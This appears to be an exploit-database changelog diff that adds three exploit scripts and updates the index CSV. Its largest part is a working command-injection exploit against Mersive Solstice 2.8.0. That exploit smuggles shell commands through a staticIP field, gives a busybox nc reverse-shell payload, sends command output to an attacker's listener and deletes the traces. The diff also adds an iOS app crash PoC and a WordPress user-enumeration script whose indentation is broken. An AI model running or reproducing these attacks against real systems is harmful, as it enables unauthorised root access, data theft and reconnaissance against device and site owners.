DB: 2019-11-29

4 changes to exploits/shellcodes

GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)
Wordpress 5.3 - User Disclosure
Mersive Solstice 2.8.0 - Remote Code Execution

exploits/hardware/webapps/47722.py

@@ -0,0 +1,208 @@
+# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution
+# Google Dork: N/A
+# Date: 2016-12-23
+# Exploit Author: Alexandre Teyar
+# Vendor Homepage: https://www2.mersive.com/
+# Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk
+# Versions: 2.8.0
+# Tested On: Mersive Solstice 2.8.0
+# CVE: CVE-2017-12945
+# Description       : This will exploit an (authenticated) blind OS command injection 
+#                     vulnerability present in Solstice devices running versions
+#                     of the firmware prior to 2.8.4.
+# Notes             : To get the the command output (in piped-mode), a netcat listener 
+#                     (e.g. 'nc -lkvp <LPORT>') needs to be launched before 
+#                     running the exploit.
+#                     To get an interactive root shell use the following syntax
+#                     'python.exe .\CVE-2017-12945.py -pass <PASSWORD>
+#                     -rh <RHOST> -p "busybox nc <LHOST> <LPORT>
+#                     -e /system/bin/sh -i"'.
+
+
+#!/usr/bin/env python3
+
+import argparse
+import logging
+import requests
+import sys
+import time
+
+
+def parse_args():
+    """ Parse and validate the command line supplied by users
+    """
+    parser = argparse.ArgumentParser(
+                description="Solstice Pod Blind Command Injection"
+            )
+
+    parser.add_argument(
+        "-d",
+        "--debug",
+        dest="loglevel",
+        help="enable verbose debug mode",
+        required=False,
+        action="store_const",
+        const=logging.DEBUG,
+        default=logging.INFO
+    )
+    parser.add_argument(
+        "-lh",
+        "--lhost",
+        dest="lhost",
+        help="the listening address",
+        required=False,
+        type=str
+    )
+    parser.add_argument(
+        "-lp",
+        "--lport",
+        dest="lport",
+        help="the listening port - default 4444",
+        required=False,
+        default="4444",
+        type=str
+    )
+    parser.add_argument(
+        "-p",
+        "--payload",
+        dest="payload",
+        help="the command to execute",
+        required=True,
+        type=str
+    )
+    parser.add_argument(
+        "-pass",
+        "--password",
+        dest="password",
+        help="the target administrator password",
+        required=False,
+        default="",
+        type=str
+    )
+    parser.add_argument(
+        "-rh",
+        "--rhost",
+        dest="rhost",
+        help="the target address",
+        required=True,
+        type=str
+    )
+
+    return parser.parse_args()
+
+
+def main():
+    try:
+        args = parse_args()
+
+        lhost = args.lhost
+        lport = args.lport
+        password = args.password
+        rhost = args.rhost
+
+        logging.basicConfig(
+            datefmt="%H:%M:%S",
+            format="%(asctime)s: %(levelname)-8s %(message)s",
+            handlers=[logging.StreamHandler()],
+            level=args.loglevel
+        )
+
+        # Redirect stdout and stderr to <FILE>
+        # only when the exploit is launched in piped mode
+        if lhost and lport:
+            payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1"
+            logging.info(
+                "attacker listening address: {}:{}".format(lhost, lport)
+            )
+        else:
+            payload = args.payload
+
+        logging.info("solstice pod address: {}".format(rhost))
+
+        if password:
+            logging.info(
+                "solstice pod administrator password: {}".format(password)
+            )
+
+        # Send the payload to be executed
+        logging.info("sending the payload...")
+        send_payload(rhost, password, payload)
+
+        # Send the results of the payload execution to the attacker
+        # using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE>
+        if lhost and lport:
+            payload = (
+                "busybox nc {} {} < /data/local/tmp/rce.tmp ".format(
+                    lhost, lport
+                )
+            )
+
+            logging.info("retrieving the results...")
+            send_payload(rhost, password, payload)
+
+            # Erase exploitation traces
+            payload = "rm -f /data/local/tmp/rce.tmp"
+
+            logging.info("erasing exploitation traces...")
+            send_payload(rhost, password, payload)
+
+    except KeyboardInterrupt:
+        logging.warning("'CTRL+C' pressed, exiting...")
+        sys.exit(0)
+
+
+def send_payload(rhost, password, payload):
+    URL = "http://{}/Config/service/saveData".format(rhost)
+
+    headers = {
+        "Content-Type": "application/json",
+        "X-Requested-With": "XMLHttpRequest",
+        "Referer": "http://{}/Config/config.html".format(rhost)
+    }
+
+    data = {
+        "m_networkCuration":
+        {
+            "ethernet":
+            {
+                "dhcp": False,
+                "staticIP": "; {}".format(payload),
+                "gateway": "",
+                "prefixLength": 24,
+                "dns1": "",
+                "dns2": ""
+            }
+        },
+        "password": "{}".format(password)
+    }
+
+    # Debugging using the BurpSuite
+    # proxies = {
+    #     'http': 'http://127.0.0.1:8080',
+    #     'https': 'https://127.0.0.1:8080'
+    # }
+
+    try:
+        logging.info("{}".format(payload))
+
+        response = requests.post(
+            URL,
+            headers=headers,
+            # proxies=proxies,
+            json=data
+        )
+
+        logging.debug(
+            "{}".format(response.json())
+        )
+
+        # Wait for the command to be executed
+        time.sleep(2)
+
+    except requests.exceptions.RequestException as ex:
+        logging.error("{}".format(ex))
+        sys.exit(0)
+
+
+if __name__ == "__main__":
+    main()

exploits/ios/dos/47721.py

@@ -0,0 +1,30 @@
+# Exploit Title: GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2019-11-27
+# Vendor Homepage: https://apps.apple.com/mx/app/ghia-camip/id1342090963
+# Software Link: App Store for iOS devices
+# Tested Version: 1.2 
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 6s iOS 13.2.3
+
+# Summary: With GHIA CamIP you can view your cameras in real time supports conventional IPC cameras, 
+# cameras with alarm, Video intercom and other devices. 
+
+
+# Steps to Produce the Crash:
+# 1.- Run python code: GHIA.py
+# 2.- Copy content to clipboard
+# 3.- Open "GHIA CamIP for iOS"
+# 4.- Go to "Add"
+# 5.- Wireless Settings
+# 6.- Connect to the internet
+# 7.- Paste Clipboard on "Password"
+# 8.- WiFi Connection
+# 9.- Start setting
+# 10- Crashed
+
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 33
+print (buffer)

exploits/php/webapps/47720.txt

@@ -0,0 +1,112 @@
+# Exploit Title : Wordpress 5.3 - User Disclosure
+# Author: SajjadBnd
+# Date: 2019-11-17
+# Software Link: https://wordpress.org/download/
+# version : wp < 5.3
+# tested on : Ubunutu 18.04 / python 2.7
+# CVE: N/A
+
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+#
+
+ 
+import requests
+import os
+import re
+import json
+import sys
+import urllib3
+ 
+def clear():
+    linux = 'clear'
+    windows = 'cls'
+    os.system([linux, windows][os.name == 'nt'])
+def Banner():
+        print('''
+- Wordpress < 5.3 - User Enumeration
+- SajjadBnd
+''')
+def Desc():
+    url = raw_input('[!] Url >> ')
+    vuln = url + "/wp-json/wp/v2/users/"
+    while True:
+        try:
+            r = requests.get(vuln,verify=False)
+            content = json.loads(r.text)
+            data(content)
+        except requests.exceptions.MissingSchema:
+        vuln = "http://" + vuln
+def data(content):
+    for x in content:
+    name = x["name"].encode('UTF-8')
+    print("======================")
+    print("[+] ID : " + str(x["id"]))
+    print("[+] Name : " + name)
+    print("[+] User : " + x["slug"])
+    sys.exit(1)
+if __name__ == '__main__':
+    urllib3.disable_warnings()
+    reload(sys)
+    sys.setdefaultencoding('UTF8')
+    clear()
+    Banner()
+    Desc()
+
+wpuser.txt
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+#
+# Exploit Title : Wordpress < 5.3 - User Disclosure
+# Exploit Author: SajjadBnd
+# email : blackwolf@post.com
+# Software Link: https://wordpress.org/download/
+# version : wp < 5.3
+# tested on : Ubunutu 18.04 / python 2.7
+
+import requests
+import os
+import re
+import json
+import sys
+import urllib3
+
+def clear():
+    linux = 'clear'
+    windows = 'cls'
+    os.system([linux, windows][os.name == 'nt'])
+
+def Banner():
+        print('''
+- Wordpress < 5.3 - User Enumeration
+- SajjadBnd
+''')
+
+def Desc():
+    url = raw_input('[!] Url >> ')
+    vuln = url + "/wp-json/wp/v2/users/"
+    while True:
+        try:
+            r = requests.get(vuln,verify=False)
+            content = json.loads(r.text)
+            data(content)
+    	except requests.exceptions.MissingSchema:
+	    vuln = "http://" + vuln
+
+def data(content):
+    for x in content:
+	name = x["name"].encode('UTF-8')
+	print("======================")
+	print("[+] ID : " + str(x["id"]))
+	print("[+] Name : " + name)
+	print("[+] User : " + x["slug"])
+    sys.exit(1)
+if __name__ == '__main__':
+    urllib3.disable_warnings()
+    reload(sys)
+    sys.setdefaultencoding('UTF8')
+    clear()
+    Banner()
+    Desc()

exploits/windows/local/46416.txt

@@ -6,7 +6,7 @@
 # Software Link: 
 # Version: 1.6.2.0 (May affect other versions)
 # Tested on: Win 10 64 bit
-# CVE : None
+# CVE : CVE-2019-15084
 
 MaxxAudio licenses their driver technology to OEMs and is commonly installed on Dell Laptops (and others) as part of other driver installations.
 

files_exploits.csv

@@ -6611,6 +6611,7 @@ id,file,description,date,author,type,platform,port
 47717,exploits/windows/dos/47717.py,"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)",2019-11-26,chuyreds,dos,windows,
 47718,exploits/windows/dos/47718.py,"Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
 47719,exploits/windows/dos/47719.py,"SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
+47721,exploits/ios/dos/47721.py,"GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)",2019-11-28,"Ivan Marmolejo",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42031,3 +42032,5 @@ id,file,description,date,author,type,platform,port
 47691,exploits/php/webapps/47691.sh,"OpenNetAdmin 18.1.1 - Remote Code Execution",2019-11-20,mattpascoe,webapps,php,
 47702,exploits/hardware/webapps/47702.txt,"TestLink 1.9.19 - Persistent Cross-Site Scripting",2019-11-21,"Milad Khoshdel",webapps,hardware,
 47704,exploits/hardware/webapps/47704.txt,"Network Management Card 6.2.0 - Host Header Injection",2019-11-21,"Amal E Thamban",webapps,hardware,
+47720,exploits/php/webapps/47720.txt,"Wordpress 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
+47722,exploits/hardware/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,hardware,